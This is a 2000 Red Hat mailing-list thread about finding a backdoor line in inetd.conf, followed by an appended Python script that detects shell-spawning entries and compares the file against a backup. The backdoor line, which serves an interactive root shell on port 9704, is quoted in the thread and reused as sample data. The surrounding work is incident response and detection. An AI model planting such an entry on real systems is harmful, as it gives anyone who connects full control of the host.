Rat B*STARD!
I thought I'd check out my inetd.conf too. I'd been looking
at the log files daily, and I was using "snort" to
watch for suspicious activity (mind you, I'm little
more than a mere novice)
Same damn line. Looks like I know what I'm doing this
weekend.... and learning IPCHAINS.
Thanks, all. I would probably have never thought to look
there.
Mark
>
> Date: Mon, 11 Sep 2000 16:22:58 -0500
> From: "Michael R. Jinks" <[EMAIL PROTECTED]>
> To: [EMAIL PROTECTED]
> Subject: Re: highly suspicious line in inetd.conf
> Reply-To: [EMAIL PROTECTED]
>
> On Mon, Sep 11, 2000 at 02:04:37PM -0700, wYRd wrote:
> >
> > Looking over a clients system I found the following
> > line in inetd.conf:
> > 9704 stream tcp nowait root /bin/sh sh -i
>
> EEK!
>
> > telnet to the port and instant root access.
>
> Yup.
>
> > A quick look around didn't reveal any obvious
> > problems. I'm worried about the non-obvious
> > now.
>
> Good man.
>
> > any suggestions for things to do and places
> > to poke into would be appreciated.
>
> Well...
>
> > (is it likely the system was compromised for
> > future use?)
>
> I'd say so, yes. And in that case all bets are off; they could have left
> behind just about anything as a back door or other malicious stuff, the only
> way you can really be sure they're gone (whoever "they" are) is to reinstall
> from bare metal. :(
>
> Don't really know what your setup is like or how long they've owned your box,
> but hopefully you've kept good logs and backups of your system so that you can
> have some idea of when the inetd.conf file was compromised (do old backup
> versions of the file have that line as well? how far back?) and can then
> cross-reference to that date in your old log files. But even then all you'd
> get would be some indication of when and how they got in, and maybe some clues
> about what they did once they got there. It's almost impossible to guarantee
> that you've undone the damage unless you were running tripwire or some other
> equivalent.
>
> This is a pretty klutzy way of owning a system, whoever did this was either
> (a) not real slick or (b) not at all concerned about being the only person
> who could own your box. But that doesn't mean that they didn't hide their
> tracks well elsewhere. Best bet is to take the machine down (at least off
> the network), secure any vital data, wipe it, and start over. Sorry.
>
> Cheers,
> -m
> --
> Michael Jinks, IB
> Systems Administrator, CCCP
> finger [EMAIL PROTECTED] for public key
> Vote Duke! http://www.entertaindom.com/pages/duke2000/home.jsp
>
> >
_______________________________________________
Redhat-list mailing list
[EMAIL PROTECTED]
https://listman.redhat.com/mailman/listinfo/redhat-list
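The thread makes two practical points: an inetd.conf entry that hands a root shell to whoever connects is easy to spot if you actually parse the file, and an old backup copy tells you when the line appeared. The script below is an added example written for this thread, not code from any of the posters or from Red Hat. It parses the classic inetd.conf field layout (service, socket type, protocol, wait/nowait, user, server program, arguments), flags entries whose server program is a shell, that are started interactively, that are registered by raw port number rather than a service name, or that run as root, and diffs the active entries against a backup copy. Both configuration texts are constructed samples embedded inline; the backup is assumed to be trustworthy.

```python
"""Audit an inetd.conf for shell-spawning entries and diff it against a backup.

Added example for the redhat-list thread above; all sample data is constructed.
"""
import os

# Constructed sample: the current file, including the line reported in the thread.
CURRENT_CONF = """\
# inetd.conf - constructed sample
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
9704 stream tcp nowait root /bin/sh sh -i
"""

# Constructed sample: an older backup of the same file (assumed trustworthy).
BACKUP_CONF = """\
# inetd.conf - constructed sample (older backup)
ftp     stream  tcp     nowait  root    /usr/sbin/tcpd  in.ftpd -l -a
telnet  stream  tcp     nowait  root    /usr/sbin/tcpd  in.telnetd
finger  stream  tcp     nowait  nobody  /usr/sbin/tcpd  in.fingerd
"""

# Program names that should never be the server for a network service.
SHELLS = {"sh", "bash", "csh", "tcsh", "ksh", "zsh", "ash", "dash"}


def parse_inetd(text):
    """Return [(lineno, entry_dict)] for active lines; comments and blanks skipped.

    Field layout: service socket_type protocol wait|nowait[.max] user[.group]
                  server_program [args...]
    """
    entries = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        fields = line.split()
        if len(fields) < 6:
            # Too few fields to be a valid entry; keep it so the audit reports it.
            entries.append((lineno, {"malformed": line}))
            continue
        entries.append((lineno, {
            "service": fields[0],
            "socket_type": fields[1],
            "protocol": fields[2],
            "wait": fields[3].split(".")[0],
            "user": fields[4].split(".")[0],   # user[.group] -> user
            "server": fields[5],
            "args": fields[6:],
        }))
    return entries


def flag_entry(entry):
    """Reasons an entry looks like a backdoor; an empty list means nothing found."""
    if "malformed" in entry:
        return ["malformed entry"]
    reasons = []
    server = os.path.basename(entry["server"])
    argv0 = os.path.basename(entry["args"][0]) if entry["args"] else ""
    if server in SHELLS or argv0 in SHELLS:
        reasons.append("server program is a shell")
        if "-i" in entry["args"]:
            reasons.append("shell started interactively (-i)")
    if entry["service"].isdigit():
        # Legitimate entries use a name from /etc/services, not a bare port.
        reasons.append("service given as a raw port number")
    if reasons and entry["user"] == "root":
        reasons.append("runs as root")
    return reasons


def audit(text):
    """Map line number -> list of reasons for every suspicious entry."""
    findings = {}
    for lineno, entry in parse_inetd(text):
        reasons = flag_entry(entry)
        if reasons:
            findings[lineno] = reasons
    return findings


def added_since_backup(current, backup):
    """Active entries present in `current` but absent from `backup`.

    Whitespace is normalised so re-indented copies of the same entry match.
    """
    def active(text):
        return {" ".join(line.split()) for line in text.splitlines()
                if line.strip() and not line.lstrip().startswith("#")}
    return sorted(active(current) - active(backup))


if __name__ == "__main__":
    for lineno, reasons in audit(CURRENT_CONF).items():
        print("line %d: %s" % (lineno, "; ".join(reasons)))
    for entry in added_since_backup(CURRENT_CONF, BACKUP_CONF):
        print("not in backup: %s" % entry)
```

On a real host you would pass the contents of /etc/inetd.conf and of each dated backup copy to `audit()` and `added_since_backup()` in turn; the first backup in which the entry is missing brackets when it was added, which is the date Michael suggests cross-referencing against the logs. The heuristics are deliberately narrow (shell as server program, interactive flag, numeric service, root) so that a clean file produces no findings; they are no substitute for the bare-metal reinstall the thread recommends once a box is known to be owned.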